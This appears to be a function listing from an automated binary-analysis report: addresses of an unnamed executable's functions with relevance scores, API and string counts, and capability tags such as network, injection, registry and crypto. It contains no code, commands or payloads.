Function 0040B428, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 004139F2, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Function 00411FB9, Relevance: 84.4, APIs: 27, Strings: 21, Instructions: 389
libraryloaderwindowCOMMON

Function 004136AC, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Function 0041628F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 004087A7, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 004117CB, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Function 00408551, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52
threadCOMMON

Function 0040EF1F, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Function 00405CE7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Function 0040C5AE, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 0041D132, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Function 0040C4F3, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0040F429, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 0041AC79, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Function 0040B7DE, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 004084FA, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 004178F9, Relevance: 4.7, APIs: 3, Instructions: 216
libraryloaderCOMMON

Function 00413002, Relevance: 4.6, APIs: 3, Instructions: 122
registryCOMMON

Function 00417429, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Function 00408C27, Relevance: 3.1, APIs: 2, Instructions: 62
filesynchronizationnetworkCOMMON

Function 00417185, Relevance: 1.7, APIs: 1, Instructions: 209
comCOMMON

Function 0041A525, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Function 00406FAF, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 00404D18, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Function 00402823, Relevance: .2, Instructions: 236
COMMONCrypto

Function 00409BD8, Relevance: .2, Instructions: 190
COMMONCrypto

Function 00408036, Relevance: .1, Instructions: 70
COMMONCrypto

Function 004050A4, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 0041A205, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Function 0040D5CF, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Function 0041BBDC, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Function 0040DB06, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 0040AB6B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 00415321, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254
COMMON

Function 0040D83A, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 00415007, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247
COMMON

Function 00405885, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Function 0040FEED, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Function 0040E685, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216
filestringCOMMON

Function 0041D3DD, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Function 00415ABB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Function 0041295C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Function 00412F03, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87
injectionCOMMON

Function 00408B6D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Function 00404F4F, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Function 0041B69B, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Function 004184D9, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Function 0040B6C1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Function 00414818, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Function 0041CEA9, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Function 0041C91F, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Function 004141C3, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Function 00405F8D, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Function 0040FA5F, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Function 0041B221, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Function 00408945, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Function 00414678, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Function 004085D9, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Function 00413C42, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
COMMON

Function 0040B39F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON